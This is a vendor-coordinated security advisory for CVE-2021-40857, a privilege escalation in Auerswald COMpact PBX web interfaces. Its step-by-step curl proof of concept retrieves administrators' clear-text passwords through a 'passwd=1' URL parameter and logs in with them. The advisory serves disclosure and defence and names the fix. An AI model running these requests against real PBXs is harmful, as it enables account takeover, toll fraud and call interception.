+49 241 510081-0
kontakt@redteam-pentesting.de
DE
DE

Contact

Contact us

+49 241 510081-0
kontakt@redteam-pentesting.de
Contact form
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header
newer
back to overview
older

Text Version

Auerswald COMpact Privilege Escalation

RedTeam Pentesting discovered a vulnerability in the web-based management interface of the Auerswald COMpact 5500R PBX which allows low-privileged users to access passwords of administrative user accounts.

Details

  • Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
  • Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
  • Fixed Versions: 8.2B
  • Vulnerability Type: Privilege Escalation
  • Security Risk: high
  • Vendor URL: https://www.auerswald.de/en/product/compact-5500r
  • Vendor Status: fixed version released
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-005
  • Advisory Status: published
  • CVE: CVE-2021-40857
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40857

Introduction

“Fully modular VoIP appliance for more efficient communication processes With the COMpact 5500R, you are originally equipped for everyday business - now and in the future.

The fully modular architecture with 80 IP channels and all the functions of a large ITC server allows up to 112 subscribers and thus scales with your company.

Continuous maintanance and expansion of the system software makes this versatile IP server a future-proof investment in any business communication.”

(from the vendor’s homepage)

More Details

Attackers with low-privileged user accounts, for example those that are used by VoIP phones, can log into the web-based management interface of the COMpact 5500R PBX. Afterwards, the list of user accounts can be listed and details shown for each user account. Adding the URL parameter “passwd=1” then also includes the clear text password for each user account, including administrative ones, which can then be used to authenticate against the management interface.

Proof of Concept

The command-line HTTP client curl (https://curl.se/) can be used as follows to log in with the username “123” and the password “secret” (shortened and formatted to increase readability):

$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/
[...]

[
  {
    "login": 1,
    "userId": 1234,
    "userRufNr": "123",
    "userName": "123",
    "pbxType": 35,
    "pbxId": 0,
    "pbx": "COMpact 5500R",
    "pbxEdit": "Comp.5500R",
    "isActivated": 1,
    "dongleTnCount": 112,
    "currentConfig": 34,
    "cur": "EUR",
    "language": 0,
    "hidePrivat": 1,
    "offlineConfig": false
  },
  [...]
]

The server returns a JSON document describing the user account as well as a session ID in a cookie. This session ID can then be used to access other API endpoints on the PBX. The following listing shows the request to the path “/logstatus_state”, which returns the current access level:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Teilnehmer"}

The access level in this case is “Teilnehmer” (member).

The list of all other users can be requested as follows:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  https://192.168.1.2/cfg_data_teilnehmer

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

[
[...]
{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},
[...]
{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}
[...]
]

Two user accounts are shown in the listing above: the current user’s account with the ID 1234 and a different user account with so-called “sub-admin” privileges with the ID 2222.

Details about a particular user account with a given ID can be requested * like this:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"123","name":"Example User",[...],
"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX",
[...], "isSubadmin":0,[...]}

In the returned JSON document, the values of the fields for the PIN, token and password are replaced by “XXX”. But if the URL parameter “passwd” is set to the value 1, the values are returned in plain text:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"123","name":"Example User",[...],
"privatPin":"12345678","privatPass":"secretpassword",
"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}

This can be repeated for other user accounts, for example for the user account with the ID 2222 shown it the listing earlier. The server returns the plain text password for the other user account:

$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \
  'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",
"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz",
[...],"isSubadmin":1,[...]}

The password can then be used to log into the PBX with the other user account:

$ curl --anyauth --user sub-admin:verysecretpassword --include \
  https://192.168.1.2/tree

[...]
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/
[...]

[{"login":2,"userId":2222,[...]}]

Checking the access level with the new session ID shows that the user is now logged in with an administrative account:

$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
  https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Sub-Administrator"}%

Workaround

Disable or restrict access to the web-based management interface if possible.

Fix

Upgrade to a firmware version which corrects this vulnerability.

Security Risk

Attackers who have acquired access to a low-privileged user account, for example by extracting such an account from a VoIP phone, can log into the web-based management interface of the COMpact 5500R PBX and access clear text passwords for other user accounts, including those with the “sub-admin” privilege. After logging in with these newly acquired credentials, attackers can access configuration settings and most other functions.

They can then for example create new SIP credentials and use them to call premium rate phone lines they operate to generate revenue. They can monitor and even redirect all incoming and outgoing phone calls and record all Ethernet data traffic.

Due to the severe and far-reaching consequences and despite the prerequisite of having to know an existing low-privilege user account, this vulnerability rated as a high risk.

Timeline

  • 2021-08-26 Vulnerability identified
  • 2021-09-01 Customer approved disclosure to vendor
  • 2021-09-10 Vendor notified
  • 2021-09-10 CVE ID requested
  • 2021-09-10 CVE ID assigned
  • 2021-10-05 Vendor provides access to device with fixed firmware
  • 2021-10-11 Vendor provides fixed firmware
  • 2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
  • 2021-12-06 Advisory published

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/